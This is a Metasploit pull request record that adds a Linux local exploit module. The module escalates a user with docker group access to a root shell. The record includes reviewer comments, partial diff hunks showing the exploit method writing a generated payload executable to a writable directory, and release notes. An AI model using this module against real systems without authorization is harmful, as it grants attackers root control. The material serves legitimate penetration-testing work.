### PR TITLE
Add privilege escalation for host users that can access the docker daemon

### PR DESCRIPTION
**Pull request by forzoni**
Escalates to root from a user shell that has access to the docker daemon.
- [x] Install Docker, add `user` to the group `docker` so it can access the daemon
- [x] Get a shell as `user`
- [x] Run this module, you should get a root shell

### CODE REVIEW

**Comment by wvu-r7** [comment]
Oops, forgot I wanted to do this. Thanks for the contribution!

**Comment by sempervictus** [comment]
@forzoni: thanks, you just took an item off a bunch of folks' TODO lists.
Will test in the near term.

**Comment by wvu-r7** [comment]
This is a very clean module, @forzoni. You should be proud.

File: modules/exploits/linux/local/docker_daemon_privilege_escalation.rb [hunk 1]
```diff
@@ -0,0 +1,75 @@
...
+      'Platform'      => 'linux',
+      'Arch'          => [ARCH_X86, ARCH_X86_64],
+      'Targets'       => [ ['Automatic', {}] ],
+      'SessionTypes'  => ['shell', 'meterpreter']
+      }
+    ))
+    register_options([
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ], self.class)
```
Comment (void-in) [inline modules/exploits/linux/local/docker_daemon_privilege_escalation.rb]: The data store options should be capitalized while the advanced options are camel style.

File: modules/exploits/linux/local/docker_daemon_privilege_escalation.rb [hunk 2]
```diff
@@ -0,0 +1,75 @@
...
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+    pl = generate_payload_exe
+    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
+    print_status("Writing payload executable to '#{exe_file}'")
+    write_file(exe_file, pl)
```
Comment (void-in) [inline modules/exploits/linux/local/docker_daemon_privilege_escalation.rb]: The payload file should be registered for cleanup through register_file_for_cleanup() API. https://github.com/rapid7/metasploit-framework/wiki/How-to-clean-up-files-using-FileDropper

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/c6214d9c5e50a93062df5daafe2806e7c9e72522

**Comment by wvu-r7** [comment]
# Release Notes

This adds a generic privilege escalation exploit for Docker. The prerequisite is being a user on the target system with ```docker``` group membership.

**Comment by wvu-r7** [comment]
# Release Notes

This adds a generic privilege escalation exploit for Docker. The prerequisite is being a user with ```docker``` group membership on the target system.

**Pull request merged**